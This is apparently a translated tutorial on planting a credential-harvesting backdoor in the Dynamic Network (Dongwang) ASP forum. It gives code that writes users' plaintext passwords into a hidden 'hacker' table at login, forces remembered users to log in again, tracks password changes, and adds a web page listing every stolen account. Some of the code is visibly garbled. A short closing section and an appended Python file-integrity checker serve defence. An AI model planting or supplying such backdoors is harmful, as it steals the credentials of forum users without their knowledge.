The Dynamic Network Pioneer Forum is powerful, full-featured and free for individual users, which makes it stand out among the many forums on the Internet. Many people regard it as the best choice for their own forum. However, the new version of the forum uses irreversible MD5 encryption for user passwords, so even administrators cannot look up the password of an individual user. Only the encrypted result can be queried in the database.
First, the login process. The user enters an account name and password; the forum calls the MD5 function to encrypt the password and then checks whether the result matches the value stored in the database. If it does, login succeeds and the user's personal information is saved in a COOKIE.
Now we have to do it ourselves and add a password-recording function to the forum.
Look at the source of the file that handles logging in to the system. The verification process directly calls the chklogin() function. Following the chklogin() function, you can see that the first few statements check whether the user filled in every field, and then:
password=md5(trim(checkStr(request("password"))))
This statement calls the MD5 encryption function to encrypt the password submitted by the user. To record the unencrypted password, we need to add our own code in front of this statement. Don't rush to write the code yet: the password has to be stored in the database, so we first have to create our own table there.
Open the Dongwang database file. We only need to save two things in this table, the user name and the password, so open "Create table using designer", enter user and pass as the field names, and set the data type to text. Then save the table and name it hacker.
Next, we can use SQL commands in the ASP program to add the username and password to the table we just created. We just need to put the following in front of the statement above:
‘First query the database and check whether the user’s password has been recorded to avoid repeated additions.
set rs=("select user from hacker where user="&request("username")&"")
if and then
‘If not, insert the username and password into the table we just created
sql="insert into hacker (user,pass) values ("&request("username")&","&request("password")&")"
(sql)
else
end if
Through the above code, every time a user logs in, the user name and password will be automatically added to the table hacker we created.
However, the Dynamic Network Forum also has a function that uses a COOKIE to save login information for a day, a month, or a year, so that users don't have to enter their account every time they visit. Of course, we don't want to miss the passwords of these users, so we have to find a way to invalidate their COOKIE, so that they must log in through the file we modified.
The code the Dynamic Network Forum uses to check the COOKIE is saved in the \INC\ file, and we open it to view its source.
membername=checkStr(("aspsky")("username"))
memberclass=checkStr(("aspsky")("userclass"))
memberword=checkStr(("aspsky")("password"))
These three statements check the information stored in the user's COOKIE. As long as we change any one of the variables, the login becomes invalid. I added the following code after the second sentence:
‘Check whether the user’s account has been recorded. If not, modify its password variable to the user name.
set rs=("select user from hacker where user="&membername&"")
if and then
memberword=checkStr(("aspsky")("username"))
else
‘If it has been recorded, COOKIE verification is normal, so that the user will not be suspicious because COOKIE is completely invalid.
memberword=checkStr(("aspsky")("password"))
end if
We have basically completed the code that records the user's account. As soon as the user logs in, his account is added directly to our database. However, we have missed one thing: if the user changes the password, the password we recorded will be out of date, and our recording program cannot tell whether the password has been modified. So we also have to modify the program that changes passwords.
rs("userpassword")=password
rs("quesion")=quesion
rs("answer")=answer
The code above is the code that updates the password. Let's analyze: a user can only change the password after logging in. Since he has logged in, his password must already be recorded in our database. So no matter what he changes his password to, we only need to update our database. So before the above four sentences, add the following two sentences:
'Note that we do not use the variable password here because it is the result of MD5 encryption
sql = "update hacker set pass="&request("psw")&" where user="&membername&""
(sql)
Finally, we cannot open the database every time we want to look up a user's password, so we also have to write an asp program ourselves to query the user's password through the WEB interface.
Below is the asp code I wrote myself, borrowing a function the Dynamic Network Forum uses for fuzzy queries. You can search for a user name directly to obtain an account, or display all recorded accounts.
<!--#include file=""-->
<!--#include file="inc/" -->
<%
‘The function translate() used by dynamic network to fuzzy query
public function translate(sourceStr,fieldStr)
  dim sourceList
  dim resultStr
  dim i,j
  if instr(sourceStr," ")>0 then
     dim isOperator
     isOperator = true
     sourceList=split(sourceStr)
     --------------------------------------------------------
     rem "num:" & cstr(ubound(sourceList)) & "<br>"
     for i = 0 to ubound(sourceList)
        rem i
    Select Case ucase(sourceList(i))
    Case "AND","&","and","and"and"
        resultStr=resultStr & " and "
        isOperator = true
    Case "OR","|"," or "
        resultStr=resultStr & " or "
        isOperator = true
    Case "NOT","!","Not","!"!"
        resultStr=resultStr & " not "
        isOperator = true
    Case "(","(","("
        resultStr=resultStr & " ( "
        isOperator = true
    Case ")",")",")"
        resultStr=resultStr & " ) "
        isOperator = true
    Case Else
        if sourceList(i)<>"" then
            if not isOperator then resultStr=resultStr & " and "
            if inStr(sourceList(i),"%") > 0 then
                resultStr=resultStr&" "&fieldStr& " like " & replace(sourceList(i),"","") & " "
            else
                resultStr=resultStr&" "&fieldStr& " like %" & replace(sourceList(i),"","") & "% "
            end if
                isOperator=false
        End if
    End Select
        rem resultStr+"<br>"
     next
     translate=resultStr
  else Single condition
     if inStr(sourcestr,"%") > 0 then
         translate=" " & fieldStr & " like " & replace(sourceStr,"","") &" "
     else
    translate=" " & fieldStr & " like %" & replace(sourceStr,"","") &"% "
     End if
  end if
end function
%>
<%
‘Check whether to use fuzzy query, if so, query the database
if ("id") <> "" then
dim key
key = ("id")
set rs=("select user,pass from hacker where (" & translate(key,"user") & ")")
‘Check whether to query all accounts. If so, query all records
else if ("id") <> "all" then
else
set rs=("select * from hacker")
end if
end if
%>
<div align="center">
  <p><strong>Query password</strong></p>
  <form name="form1" method="post" action="">
     Username:
    <input name="id" type="text" size="12">

    <input type="submit" name="Submit" value="Search">
  </form>
  <p><a href="?id=all">Show all </a></p>
  <table width="300" border="1" cellspacing="0" cellpadding="0">
<%
‘Check whether to query the account. If it is not displayed, please select the query method, otherwise the results will be displayed.
if ("id") <> "" or ("id") <> "" then %><tr>
       <td width="150"><div align="center">Username</div></td>
       <td width="150"><div align="center">Password</div></td>
    </tr>
<% Do while (not ) %><tr>
      <td><% =rs("user") %></td>
      <td><% =rs("pass") %></td>
    </tr>
  <%
   Loop

  else
  ("<tr><td><center>Please select the query method</center></td></tr>")
  end if
   %>
  </table>
</div>
Some other thoughts:
If the server is hacked, we must also prevent the forum from being modified and becoming a tool for others to obtain passwords, so we must consider the common methods used by hackers.
First of all, we need to check whether the database is complete at any time, and we must achieve timely seniority. A popular approach nowadays is to change the database file's suffix to asp and add an undeletable table to the database, which effectively prevents the database from being downloaded by others. Conversely, a hacker is likely to change the suffix of his own database file to asp as well, hiding it among the site's many files. Inexperienced administrators generally find this hard to spot, so the files of the entire website need to be checked regularly. If extra asp files appear for no reason, they were probably left there by an intruder.
Hackers can not only upload their own asp files; a smart hacker will also hide his code inside existing asp files. Using a browser, querystring variables can be passed to the asp file. If a conditional statement is set in the asp file: if ("variable") = " then... This simple method is very hard to guard against. Because the database is so convenient, ordinary administrators rarely think of checking whether the files on the server have been modified. Therefore, it is also very necessary to check regularly whether the files have been modified.
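One way to carry out the regular file check recommended above, as an added example that is not part of the original article or of the forum's code: it compares the site's script files with a baseline taken from a known-clean install and reports added, modified and missing files, plus any new asp file that is really an Access database. The file names in `demo()` are constructed, and the suffix list is an assumption.

```python
import hashlib
import tempfile
from pathlib import Path

SCRIPT_SUFFIXES = {".asp", ".asa", ".inc"}   # assumed set of server-side suffixes
# Access (Jet/ACE) database files carry one of these strings at byte offset 4.
ACCESS_MAGICS = (b"Standard Jet DB", b"Standard ACE DB")


def describe(path):
    """Return the SHA-256 of a file and whether it is really an Access database."""
    data = Path(path).read_bytes()
    is_db = any(data[4:4 + len(m)] == m for m in ACCESS_MAGICS)
    return {"sha256": hashlib.sha256(data).hexdigest(), "is_db": is_db}


def snapshot(root):
    """Map every script-suffixed file under root to its description."""
    root = Path(root)
    return {
        p.relative_to(root).as_posix(): describe(p)
        for p in sorted(root.rglob("*"))
        if p.is_file() and p.suffix.lower() in SCRIPT_SUFFIXES
    }


def audit(root, baseline):
    """Compare the live tree with a trusted baseline from a clean install."""
    current = snapshot(root)
    report = {"added": [], "modified": [], "missing": [], "hidden_db": []}
    for rel, now in current.items():
        known = baseline.get(rel)
        if known is None:
            report["added"].append(rel)
            if now["is_db"]:
                report["hidden_db"].append(rel)   # unknown database posing as asp
        elif known["is_db"] and now["is_db"]:
            continue  # the forum's own renamed database changes with every post
        elif known != now:
            report["modified"].append(rel)
    report["missing"] = sorted(set(baseline) - set(current))
    return report


def demo():
    """Constructed site tree: take a baseline, simulate tampering, then audit."""
    jet_header = b"\x00\x01\x00\x00Standard Jet DB\x00" + b"\x00" * 16
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "inc").mkdir()
        (root / "login.asp").write_text("<% ' original login page %>")
        (root / "inc" / "check.asp").write_text("<% ' original cookie check %>")
        (root / "forumdata.asp").write_bytes(jet_header + b"v1")
        baseline = snapshot(root)          # keep this copy off the web server

        (root / "login.asp").write_text("<% ' login page with extra lines %>")
        (root / "forumdata.asp").write_bytes(jet_header + b"v2")  # normal activity
        (root / "query.asp").write_text("<% ' page nobody installed %>")
        (root / "inc" / "stats.asp").write_bytes(jet_header + b"x")
        return audit(root, baseline)


if __name__ == "__main__":
    for kind, files in demo().items():
        print(kind, files)
```

Because the forum's own database is expected to change, this check cannot see a table added inside it; listing the database's tables and comparing them with the clean install's schema covers that case.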